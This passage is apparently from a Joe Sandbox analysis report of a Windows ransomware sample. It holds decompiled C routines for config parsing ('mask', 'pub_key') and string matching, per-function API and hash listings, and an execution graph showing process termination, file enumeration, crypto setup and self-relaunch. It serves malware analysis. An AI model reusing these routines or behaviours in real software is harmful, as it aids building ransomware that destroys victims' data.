                                    • lstrlenA.KERNEL32(0F585444,00000000,?,0F585445,?,0F5834BF,0F585445,00000001,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F583251
                                    • GetProcessHeap.KERNEL32(00000008,00000001,?,0F5834BF,0F585445,00000001,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F58325B
                                    • HeapAlloc.KERNEL32(00000000,?,0F5834BF,0F585445,00000001,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F583262
                                    • lstrlenA.KERNEL32(0F585444,00000000,?,0F585445,?,0F5834BF,0F585445,00000001,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F583273
                                    • GetProcessHeap.KERNEL32(00000008,00000001,?,0F5834BF,0F585445,00000001,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F58327D
                                    • HeapAlloc.KERNEL32(00000000,?,0F5834BF,0F585445,00000001,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F583284
                                    • lstrcpyA.KERNEL32(00000000,0F585444,?,0F5834BF,0F585445,00000001,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F583293
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocProcesslstrlen$lstrcpy
                                    • String ID:
                                    • API String ID: 511007297-0
                                    • Opcode ID: 09f10d3b3c259155b6958d15611f55180743da09de1cb546d5ae490d8b099b59
                                    • Instruction ID: 811f56816fac90b3f697cb9b47ea68c04c6809e84355938d8d5aa19c9def892c
                                    • Opcode Fuzzy Hash: 09f10d3b3c259155b6958d15611f55180743da09de1cb546d5ae490d8b099b59
                                    • Instruction Fuzzy Hash: 5711E9304041547ED7102F68D548BE67F58FF02B21F944526E8C6FB302C779A4578761
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 97%
                                    			E0F5833E0(int* __ecx, void* __eflags, CHAR* _a4) {
                                    				int* _v8;
                                    				void* _t8;
                                    				char _t10;
                                    				void* _t14;
                                    				void* _t15;
                                    				char _t18;
                                    				char _t19;
                                    				int _t20;
                                    				CHAR* _t23;
                                    				CHAR* _t26;
                                    				CHAR* _t35;
                                    				CHAR* _t40;
                                    
                                    				_push(__ecx);
                                    				_t26 = _a4;
                                    				_t37 = __ecx;
                                    				_v8 = __ecx;
                                    				__ecx[3] = _t26;
                                    				_t8 = E0F5832B0(__ecx);
                                    				if(_t8 == 0 || _t8 == 0xffffffff) {
                                    					ExitProcess(0);
                                    				}
                                    				if(E0F583320(__ecx) == 0) {
                                    					 *__ecx = 0;
                                    					_t10 =  *_t26;
                                    					if(_t10 == 0) {
                                    						goto L4;
                                    					} else {
                                    						do {
                                    							if(_t10 == 0x7b) {
                                    								_t26 =  &(_t26[1]);
                                    								_t14 = E0F583190(_t26);
                                    								if(_t14 != 0) {
                                    									_t15 = _t14 - 1;
                                    									if(_t15 == 0) {
                                    										E0F583200(_t37, _t26, 1);
                                    									} else {
                                    										if(_t15 == 1) {
                                    											_t18 =  *_t26;
                                    											_t35 = _t26;
                                    											if(_t18 == 0) {
                                    												L15:
                                    												_t19 =  *_t35;
                                    												if(_t19 != 0x7d) {
                                    													_t40 = _t35;
                                    													if(_t19 != 0) {
                                    														while( *_t40 != 0x7d) {
                                    															_t40 =  &(_t40[1]);
                                    															if( *_t40 != 0) {
                                    																continue;
                                    															} else {
                                    															}
                                    															goto L21;
                                    														}
                                    														 *_t40 = 0;
                                    													}
                                    													L21:
                                    													_t20 = lstrlenA(_t35);
                                    													_t23 = HeapAlloc(GetProcessHeap(), 8, _t20 + 1);
                                    													 *(_v8 + 8) = _t23;
                                    													if(_t23 != 0) {
                                    														lstrcpyA(_t23, _t35);
                                    													}
                                    													 *_t40 = 0x7d;
                                    													_t37 = _v8;
                                    												}
                                    											} else {
                                    												while(_t18 != 0x7d) {
                                    													_t35 =  &(_t35[1]);
                                    													if(_t18 == 0x3d) {
                                    														goto L15;
                                    													} else {
                                    														_t18 =  *_t35;
                                    														if(_t18 != 0) {
                                    															continue;
                                    														} else {
                                    															goto L15;
                                    														}
                                    													}
                                    													goto L25;
                                    												}
                                    											}
                                    										}
                                    									}
                                    								}
                                    							}
                                    							L25:
                                    							_t7 =  &(_t26[1]); // 0x97850fe0
                                    							_t10 =  *_t7;
                                    							_t26 =  &(_t26[1]);
                                    						} while (_t10 != 0);
                                    						return 1;
                                    					}
                                    				} else {
                                    					 *__ecx = 1;
                                    					L4:
                                    					return 1;
                                    				}
                                    			}















                                    0x0f5833e3
                                    0x0f5833e5
                                    0x0f5833e9
                                    0x0f5833eb
                                    0x0f5833ee
                                    0x0f5833f1
                                    0x0f5833f8
                                    0x0f5834db
                                    0x0f5834db
                                    0x0f583410
                                    0x0f583425
                                    0x0f58342b
                                    0x0f58342f
                                    0x00000000
                                    0x0f583431
                                    0x0f583432
                                    0x0f583434
                                    0x0f58343a
                                    0x0f583441
                                    0x0f583444
                                    0x0f58344a
                                    0x0f58344b
                                    0x0f5834ba
                                    0x0f58344d
                                    0x0f58344e
                                    0x0f583450
                                    0x0f583452
                                    0x0f583456
                                    0x0f583467
                                    0x0f583467
                                    0x0f58346b
                                    0x0f58346d
                                    0x0f583471
                                    0x0f583473
                                    0x0f583478
                                    0x0f58347c
                                    0x00000000
                                    0x00000000
                                    0x0f58347e
                                    0x00000000
                                    0x0f58347c
                                    0x0f583480
                                    0x0f583480
                                    0x0f583483
                                    0x0f583484
                                    0x0f583495
                                    0x0f58349e
                                    0x0f5834a3
                                    0x0f5834a7
                                    0x0f5834a7
                                    0x0f5834ad
                                    0x0f5834b0
                                    0x0f5834b0
                                    0x00000000
                                    0x0f583458
                                    0x0f58345c
                                    0x0f58345f
                                    0x00000000
                                    0x0f583461
                                    0x0f583461
                                    0x0f583465
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f583465
                                    0x00000000
                                    0x0f58345f
                                    0x0f583458
                                    0x0f583456
                                    0x0f58344e
                                    0x0f58344b
                                    0x0f583444
                                    0x0f5834bf
                                    0x0f5834bf
                                    0x0f5834bf
                                    0x0f5834c2
                                    0x0f5834c3
                                    0x0f5834d6
                                    0x0f5834d6
                                    0x0f583412
                                    0x0f583412
                                    0x0f583418
                                    0x0f583422
                                    0x0f583422

                                    APIs
                                      • Part of subcall function 0F5832B0: lstrlenA.KERNEL32(?,00000000,?,0F585444,?,?,0F5833F6,00000000,00000000,?,?,0F585444,00000000), ref: 0F5832C5
                                      • Part of subcall function 0F5832B0: lstrlenA.KERNEL32(?,?,0F5833F6,00000000,00000000,?,?,0F585444,00000000,?,?,?,?,0F585615,00000000,popkadurak), ref: 0F5832EE
                                    • lstrlenA.KERNEL32(0F585445,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000,?,?,?,?,0F585615,00000000,popkadurak), ref: 0F583484
                                    • GetProcessHeap.KERNEL32(00000008,00000001,?,0F585444,00000000,?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F58348E
                                    • HeapAlloc.KERNEL32(00000000,?,0F585444,00000000,?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F583495
                                    • lstrcpyA.KERNEL32(00000000,0F585445,?,0F585444,00000000,?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F5834A7
                                    • ExitProcess.KERNEL32 ref: 0F5834DB
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$HeapProcess$AllocExitlstrcpy
                                    • String ID:
                                    • API String ID: 1867342102-0
                                    • Opcode ID: 2cb9ae02c7b91c7aba9ed2e52654505e02047253668d4aa199c3f186de03da39
                                    • Instruction ID: 5393b5967fb15e5b77a6371f14ce5878435e1c365e4656408ba4f444b5118171
                                    • Opcode Fuzzy Hash: 2cb9ae02c7b91c7aba9ed2e52654505e02047253668d4aa199c3f186de03da39
                                    • Instruction Fuzzy Hash: B3310570504A456AEB223F68C44C7F57F54BB42B10F9841BAE8C5FB2A3D76E68478760
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _memset.LIBCMT ref: 0F583D42
                                    • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003), ref: 0F583D66
                                    • VerSetConditionMask.KERNEL32(00000000), ref: 0F583D6A
                                    • VerSetConditionMask.KERNEL32(00000000), ref: 0F583D6E
                                    • VerifyVersionInfoW.KERNEL32 ref: 0F583D95
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ConditionMask$InfoVerifyVersion_memset
                                    • String ID:
                                    • API String ID: 3299124433-0
                                    • Opcode ID: 5098bf79b92310458a44c74fadc14e4466f8ffa0986609baf8a66ddad1a9261f
                                    • Instruction ID: 6c2f69a5d26e00a9762ce04fae090be22d89df6d8b210bb27d6dc0145c04b085
                                    • Opcode Fuzzy Hash: 5098bf79b92310458a44c74fadc14e4466f8ffa0986609baf8a66ddad1a9261f
                                    • Instruction Fuzzy Hash: 2F1112B0D4031C7EEB619F64DC0ABEA7BBCEB08700F004195A508F61C1D6B95B548FD5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 97%
                                    			E0F584EA0(intOrPtr* __ecx, CHAR* __edx, intOrPtr* _a4) {
                                    				CHAR* _v8;
                                    				char _v12;
                                    				char _v20;
                                    				char _t16;
                                    				char _t20;
                                    				char _t21;
                                    				intOrPtr* _t24;
                                    				intOrPtr _t25;
                                    				intOrPtr _t26;
                                    				intOrPtr* _t29;
                                    				CHAR* _t33;
                                    				intOrPtr _t34;
                                    				intOrPtr _t35;
                                    				void* _t38;
                                    				void* _t41;
                                    				intOrPtr* _t42;
                                    				void* _t47;
                                    				void* _t49;
                                    				intOrPtr* _t51;
                                    				CHAR* _t53;
                                    
                                    				asm("movq xmm0, [0xf58faac]");
                                    				_t16 =  *0xf58fab4; // 0x0
                                    				_t29 = _a4;
                                    				_v8 = __edx;
                                    				_t51 = __ecx;
                                    				asm("movq [ebp-0x10], xmm0");
                                    				_v12 = _t16;
                                    				if( *_t29 == 0) {
                                    					L11:
                                    					if(_t51 == 0) {
                                    						goto L10;
                                    					} else {
                                    						if(_v20 == 0) {
                                    							L22:
                                    							if(_t51 == 0) {
                                    								goto L10;
                                    							} else {
                                    								_t53 = _t51 + lstrlenA( &_v20);
                                    								while(1) {
                                    									_t20 =  *_t53;
                                    									if(_t20 >= 0x30 && _t20 <= 0x39) {
                                    										break;
                                    									}
                                    									_t53 =  &(_t53[1]);
                                    								}
                                    								_t33 = _t53;
                                    								while(1) {
                                    									_t21 =  *_t33;
                                    									if(_t21 < 0x30 || _t21 > 0x39) {
                                    										goto L30;
                                    									}
                                    									L31:
                                    									_t33 =  &(_t33[1]);
                                    									continue;
                                    									L30:
                                    									if(_t21 == 0x2e) {
                                    										goto L31;
                                    									}
                                    									 *_t33 = 0;
                                    									return lstrcpyA(_v8, _t53);
                                    									goto L33;
                                    								}
                                    							}
                                    						} else {
                                    							_t34 =  *_t51;
                                    							if(_t34 != 0) {
                                    								_t47 = _t51 -  &_v20;
                                    								do {
                                    									_t24 =  &_v20;
                                    									if(_t34 == 0) {
                                    										L19:
                                    										if( *_t24 == 0) {
                                    											goto L22;
                                    										} else {
                                    											goto L20;
                                    										}
                                    									} else {
                                    										while(1) {
                                    											_t35 =  *_t24;
                                    											if(_t35 == 0) {
                                    												goto L22;
                                    											}
                                    											_t41 =  *((char*)(_t47 + _t24)) - _t35;
                                    											if(_t41 != 0) {
                                    												goto L19;
                                    											} else {
                                    												_t24 = _t24 + 1;
                                    												if( *((intOrPtr*)(_t47 + _t24)) != _t41) {
                                    													continue;
                                    												} else {
                                    													goto L19;
                                    												}
                                    											}
                                    											goto L33;
                                    										}
                                    										goto L22;
                                    									}
                                    									goto L33;
                                    									L20:
                                    									_t34 =  *((intOrPtr*)(_t51 + 1));
                                    									_t51 = _t51 + 1;
                                    									_t47 = _t47 + 1;
                                    								} while (_t34 != 0);
                                    							}
                                    							goto L10;
                                    						}
                                    					}
                                    				} else {
                                    					_t25 =  *__ecx;
                                    					if(_t25 == 0) {
                                    						L10:
                                    						return lstrcpyA(_v8, "fabian wosar <3");
                                    					} else {
                                    						_t49 = __ecx - _t29;
                                    						do {
                                    							_t42 = _t29;
                                    							if(_t25 == 0) {
                                    								L8:
                                    								if( *_t42 == 0) {
                                    									goto L11;
                                    								} else {
                                    									goto L9;
                                    								}
                                    							} else {
                                    								while(1) {
                                    									_t26 =  *_t42;
                                    									if(_t26 == 0) {
                                    										goto L11;
                                    									}
                                    									_t38 =  *((char*)(_t49 + _t42)) - _t26;
                                    									if(_t38 != 0) {
                                    										goto L8;
                                    									} else {
                                    										_t42 = _t42 + 1;
                                    										if( *((intOrPtr*)(_t49 + _t42)) != _t38) {
                                    											continue;
                                    										} else {
                                    											goto L8;
                                    										}
                                    									}
                                    									goto L33;
                                    								}
                                    								goto L11;
                                    							}
                                    							goto L33;
                                    							L9:
                                    							_t25 =  *((intOrPtr*)(_t51 + 1));
                                    							_t51 = _t51 + 1;
                                    							_t49 = _t49 + 1;
                                    						} while (_t25 != 0);
                                    						goto L10;
                                    					}
                                    				}
                                    				L33:
                                    			}























                                    0x0f584ea6
                                    0x0f584eae
                                    0x0f584eb4
                                    0x0f584eb9
                                    0x0f584ebc
                                    0x0f584ec1
                                    0x0f584ec6
                                    0x0f584ec9
                                    0x0f584f1a
                                    0x0f584f1c
                                    0x00000000
                                    0x0f584f1e
                                    0x0f584f22
                                    0x0f584f5f
                                    0x0f584f61
                                    0x00000000
                                    0x0f584f63
                                    0x0f584f6d
                                    0x0f584f70
                                    0x0f584f70
                                    0x0f584f74
                                    0x00000000
                                    0x00000000
                                    0x0f584f7a
                                    0x0f584f7a
                                    0x0f584f7d
                                    0x0f584f80
                                    0x0f584f80
                                    0x0f584f84
                                    0x00000000
                                    0x00000000
                                    0x0f584f8e
                                    0x0f584f8e
                                    0x00000000
                                    0x0f584f8a
                                    0x0f584f8c
                                    0x00000000
                                    0x00000000
                                    0x0f584f95
                                    0x0f584fa4
                                    0x00000000
                                    0x0f584fa4
                                    0x0f584f80
                                    0x0f584f24
                                    0x0f584f24
                                    0x0f584f28
                                    0x0f584f2f
                                    0x0f584f31
                                    0x0f584f31
                                    0x0f584f36
                                    0x0f584f4f
                                    0x0f584f52
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f584f38
                                    0x0f584f38
                                    0x0f584f38
                                    0x0f584f3c
                                    0x00000000
                                    0x00000000
                                    0x0f584f45
                                    0x0f584f47
                                    0x00000000
                                    0x0f584f49
                                    0x0f584f49
                                    0x0f584f4d
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f584f4d
                                    0x00000000
                                    0x0f584f47
                                    0x00000000
                                    0x0f584f38
                                    0x00000000
                                    0x0f584f54
                                    0x0f584f54
                                    0x0f584f57
                                    0x0f584f58
                                    0x0f584f59
                                    0x0f584f5d
                                    0x00000000
                                    0x0f584f28
                                    0x0f584f22
                                    0x0f584ecb
                                    0x0f584ecb
                                    0x0f584ecf
                                    0x0f584f05
                                    0x0f584f19
                                    0x0f584ed1
                                    0x0f584ed3
                                    0x0f584ed5
                                    0x0f584ed5
                                    0x0f584ed9
                                    0x0f584ef7
                                    0x0f584efa
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f584edb
                                    0x0f584ee0
                                    0x0f584ee0
                                    0x0f584ee4
                                    0x00000000
                                    0x00000000
                                    0x0f584eed
                                    0x0f584eef
                                    0x00000000
                                    0x0f584ef1
                                    0x0f584ef1
                                    0x0f584ef5
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f584ef5
                                    0x00000000
                                    0x0f584eef
                                    0x00000000
                                    0x0f584ee0
                                    0x00000000
                                    0x0f584efc
                                    0x0f584efc
                                    0x0f584eff
                                    0x0f584f00
                                    0x0f584f01
                                    0x00000000
                                    0x0f584ed5
                                    0x0f584ecf
                                    0x00000000

                                    APIs
                                    • lstrcpyA.KERNEL32(?,fabian wosar <3,?,0F5851ED), ref: 0F584F0D
                                    • lstrlenA.KERNEL32(00000000,?,0F5851ED), ref: 0F584F67
                                    • lstrcpyA.KERNEL32(?,?,?,0F5851ED), ref: 0F584F98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID: fabian wosar <3
                                    • API String ID: 367037083-1724090804
                                    • Opcode ID: ee5f67d4a8da7a1e21080e4d8712276d4c58a5ef008175b37af3526b31fee9ae
                                    • Instruction ID: d9b35829451fd4d31406d3ed64547f20581a92da1a4b9f184b729a44e9cba122
                                    • Opcode Fuzzy Hash: ee5f67d4a8da7a1e21080e4d8712276d4c58a5ef008175b37af3526b31fee9ae
                                    • Instruction Fuzzy Hash: 493103218082A75ADB22EE2854503FABFA1BF43211F9851EDDCD5BB307D3615447C7D0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F583190(CHAR* _a4) {
                                    				char _t6;
                                    				CHAR* _t13;
                                    				CHAR* _t16;
                                    
                                    				_t13 = _a4;
                                    				_t16 = _t13;
                                    				if( *_t13 == 0) {
                                    					L5:
                                    					lstrcmpiA(_t13, "mask");
                                    					_t10 =  ==  ? 1 : 0;
                                    					lstrcmpiA(_a4, "pub_key");
                                    					 *_t16 = 0x3d;
                                    					_t11 =  ==  ? 2 :  ==  ? 1 : 0;
                                    					_t5 =  ==  ? 2 :  ==  ? 1 : 0;
                                    					return  ==  ? 2 :  ==  ? 1 : 0;
                                    				} else {
                                    					while(1) {
                                    						_t6 =  *_t16;
                                    						if(_t6 == 0x7d) {
                                    							break;
                                    						}
                                    						if(_t6 == 0x3d) {
                                    							 *_t16 = 0;
                                    							goto L5;
                                    						} else {
                                    							_t16 =  &(_t16[1]);
                                    							if( *_t16 != 0) {
                                    								continue;
                                    							} else {
                                    								goto L5;
                                    							}
                                    						}
                                    						goto L8;
                                    					}
                                    					return 0;
                                    				}
                                    				L8:
                                    			}






                                    0x0f583193
                                    0x0f583197
                                    0x0f58319c
                                    0x0f5831b0
                                    0x0f5831b9
                                    0x0f5831ce
                                    0x0f5831d1
                                    0x0f5831d9
                                    0x0f5831e1
                                    0x0f5831e4
                                    0x0f5831e9
                                    0x0f5831a0
                                    0x0f5831a0
                                    0x0f5831a0
                                    0x0f5831a4
                                    0x00000000
                                    0x00000000
                                    0x0f5831a8
                                    0x0f5831ec
                                    0x00000000
                                    0x0f5831aa
                                    0x0f5831aa
                                    0x0f5831ae
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f5831ae
                                    0x00000000
                                    0x0f5831a8
                                    0x0f5831f5
                                    0x0f5831f5
                                    0x00000000

                                    APIs
                                    • lstrcmpiA.KERNEL32(0F585444,mask,0F585445,?,?,0F583441,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F5831B9
                                    • lstrcmpiA.KERNEL32(0F585444,pub_key,?,0F583441,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F5831D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcmpi
                                    • String ID: mask$pub_key
                                    • API String ID: 1586166983-1355590148
                                    • Opcode ID: 74e08ff8f6eb92781eca81078024d7b71b36a7e29bfee0a36dc9fac493765134
                                    • Instruction ID: 85da7ed5d81de2fe1a2b3a3d45e16c5e199c81a0ecb1df7bb91ee0197f6ee925
                                    • Opcode Fuzzy Hash: 74e08ff8f6eb92781eca81078024d7b71b36a7e29bfee0a36dc9fac493765134
                                    • Instruction Fuzzy Hash: 66F046723082845EF7155A689C457E1BFC8AB45F10F94047FE6CAE6242C2AA98838350
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Execution Graph

                                    Execution Coverage:21.3%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:0%
                                    Total number of Nodes:680
                                    Total number of Limit Nodes:12
                                    execution_graph 2469 f584a78 2470 f584a74 2469->2470 2471 f584a8f OpenProcess 2470->2471 2472 f584ac4 Process32NextW 2470->2472 2471->2470 2473 f584aa1 TerminateProcess CloseHandle 2471->2473 2472->2470 2474 f584ad7 2472->2474 2473->2470 2475 f584ae9 FindCloseChangeNotification 2474->2475 2476 f584adb VirtualFree 2474->2476 2476->2475 2372 f582c50 2373 f582cda CreateThread DestroyWindow 2372->2373 2374 f582c7b 2372->2374 2375 f582c80 DefWindowProcW 2374->2375 2376 f582c97 BeginPaint lstrlenW TextOutW EndPaint 2374->2376 2377 f582d10 SendMessageW ExitThread 2477 f585ff0 2478 f586012 2477->2478 2479 f58603e GetPEB 2478->2479 2480 f586058 2479->2480 2378 f586dd5 VirtualFree 2481 f586e69 2482 f586e70 lstrcmpW 2481->2482 2483 f586e8a lstrcmpW 2482->2483 2484 f586f13 FindNextFileW 2482->2484 2483->2484 2485 f586ea0 lstrcatW 2483->2485 2484->2482 2486 f586f2b FindClose 2484->2486 2487 f586eb3 lstrcatW 2485->2487 2490 f586ecc 2485->2490 2488 f586f34 2486->2488 2489 f586df0 34 API calls 2487->2489 2489->2490 2490->2484 1707 f584b20 Sleep 1752 f5847d0 1707->1752 1710 f584b3a ExitProcess 1711 f584b42 CreateThread 1712 f584b8c 1711->1712 1713 f584b60 WaitForSingleObject 1711->1713 2261 f582d30 1711->2261 1768 f5848c0 CreateToolhelp32Snapshot VirtualAlloc 1712->1768 1714 f584b82 CloseHandle 1713->1714 1715 f584b76 TerminateThread 1713->1715 1714->1712 1715->1714 1717 f584b91 1778 f5842b0 1717->1778 1721 f584b9e 1722 f584bec VirtualAlloc 1721->1722 1733 f584c3b 1721->1733 1724 f584c09 GetModuleFileNameW 1722->1724 1725 f584c33 ExitProcess 1722->1725 1723 f584c75 1730 f584ce8 1723->1730 1731 f584c9f lstrlenA VirtualAlloc CryptStringToBinaryA 1723->1731 1852 f583db0 1724->1852 1729 f584c5f Sleep 1729->1733 1863 f584200 1730->1863 1731->1730 1734 f584ce0 ExitProcess 1731->1734 1733->1723 1733->1729 1801 f585860 1733->1801 1736 f584d12 1872 f583ff0 VirtualAlloc GetTickCount 1736->1872 1737 f584d05 1866 f5841d0 1737->1866 1741 f584d1a DeleteCriticalSection 1880 f583c70 AllocateAndInitializeSid 1741->1880 1743 f584d2a 1744 f584d33 VirtualAlloc 1743->1744 1884 f5845b0 1743->1884 1746 f584d7a 1744->1746 1747 f584d50 GetModuleFileNameW 1744->1747 1748 f584d9d ExitThread 1746->1748 1749 f584d83 ShellExecuteW 1746->1749 1750 f583db0 17 API calls 1747->1750 1749->1748 1751 f584d69 VirtualFree 1750->1751 1751->1746 1891 f583bc0 GetProcessHeap 1752->1891 1754 f584807 1892 f587490 1754->1892 1758 f584819 VirtualAlloc 1759 f584838 lstrcpyW lstrlenW 1758->1759 1974 f5870a0 1759->1974 1762 f584869 CreateMutexW GetLastError 1763 f58488a VirtualFree 1762->1763 1764 f584881 GetLastError 1762->1764 2000 f587d70 1763->2000 1764->1763 1769 f584a58 1768->1769 1770 f584a6b 1768->1770 1769->1770 1771 f584a63 Process32FirstW 1769->1771 1772 f584a8f OpenProcess 1770->1772 1773 f584ac4 Process32NextW 1770->1773 1771->1770 1772->1770 1774 f584aa1 TerminateProcess CloseHandle 1772->1774 1773->1770 1775 f584ad7 1773->1775 1774->1770 1776 f584ae9 FindCloseChangeNotification 1775->1776 1777 f584adb VirtualFree 1775->1777 1776->1717 1777->1776 1779 f584598 1778->1779 1780 f5842cb 1778->1780 1798 f586550 VirtualAlloc VirtualAlloc 1779->1798 2071 f583bc0 GetProcessHeap 1780->2071 1782 f5842f6 1783 f587490 96 API calls 1782->1783 1784 f584302 1783->1784 1785 f5872a0 16 API calls 1784->1785 1786 f58430e VirtualAlloc 1785->1786 1787 f584332 1786->1787 1788 f5870a0 49 API calls 1787->1788 1789 f584350 1788->1789 1790 f58435c lstrlenW 1789->1790 1797 f584390 1790->1797 1791 f584456 1793 f584578 VirtualFree 1791->1793 1794 f584547 VirtualAlloc 1791->1794 1792 f5843e0 lstrcpyW lstrlenW 1792->1791 1792->1797 1796 f587d70 10 API calls 1793->1796 1794->1793 1795 f584564 wsprintfW 1794->1795 1795->1793 1796->1779 1797->1791 1797->1792 2072 f5863e0 CryptAcquireContextW 1798->2072 2080 f583bc0 GetProcessHeap 1801->2080 1803 f5858a4 1804 f587490 96 API calls 1803->1804 1805 f5858ad 1804->1805 1806 f5872a0 16 API calls 1805->1806 1807 f5858b6 VirtualAlloc 1806->1807 1808 f5858ee 1807->1808 1809 f585d98 VirtualFree 1808->1809 1810 f585961 6 API calls 1808->1810 1811 f587d70 10 API calls 1809->1811 1812 f5859e0 lstrlenA 1810->1812 1813 f585dae 1811->1813 1815 f585a08 lstrlenA 1812->1815 1813->1733 1817 f585a4e lstrlenA 1815->1817 1818 f585a24 lstrlenA 1815->1818 1819 f585a7e lstrcatW lstrlenW 1817->1819 1825 f585a57 lstrlenA 1817->1825 1823 f585a4a 1818->1823 1820 f5870a0 49 API calls 1819->1820 1822 f585aa8 1820->1822 2081 f5835c0 VirtualAlloc 1822->2081 1823->1817 1825->1819 1827 f585ac5 1828 f585ac9 ExitProcess 1827->1828 1829 f585ad0 18 API calls 1827->1829 1830 f585bcb lstrlenW 1829->1830 1832 f585be9 VirtualFree 1830->1832 1833 f585bf7 lstrlenW VirtualAlloc 1830->1833 1832->1833 1834 f585c1a wsprintfA 1833->1834 1835 f585c2e 1833->1835 1834->1835 2093 f585f00 VirtualAlloc 1835->2093 1838 f585c69 GetLastError 1839 f585c6f lstrlenA VirtualAlloc lstrlenA 1838->1839 1840 f585c97 lstrlenA 1839->1840 1842 f585cd6 lstrlenA MultiByteToWideChar 1840->1842 1846 f585cb0 lstrlenA 1840->1846 2102 f5854f0 1842->2102 1846->1842 1847 f585d5c VirtualFree VirtualFree VirtualFree 1847->1809 1848 f585d0f VirtualFree VirtualFree VirtualFree VirtualFree 1850 f587d70 10 API calls 1848->1850 1851 f585d53 1850->1851 1851->1733 2228 f583cf0 1852->2228 1854 f583fca VirtualFree 1854->1725 1855 f583dc6 1855->1854 1856 f583c70 4 API calls 1855->1856 1857 f583dd3 1856->1857 1857->1854 1858 